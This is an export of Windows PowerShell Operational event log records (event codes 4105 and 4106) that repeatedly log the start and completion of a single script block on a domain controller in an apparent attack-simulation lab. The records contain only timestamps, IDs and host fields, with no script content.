OpCode=On create calls
RecordNumber=1474676
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474675
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474674
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474673
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474672
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474671
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474670
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474669
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474668
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474667
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474666
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474665
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474664
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474663
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474662
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474661
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474660
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474659
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474658
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474657
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474656
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474655
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474654
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474653
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474652
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474651
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474650
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474649
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474648
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474647
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474646
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474645
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474644
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474643
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474642
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474641
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474640
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474639
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474638
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474637
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474636
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474635
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474634
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474633
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474632
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474631
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474630
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474629
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474628
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474627
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474626
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474625
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474624
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474623
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474622
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
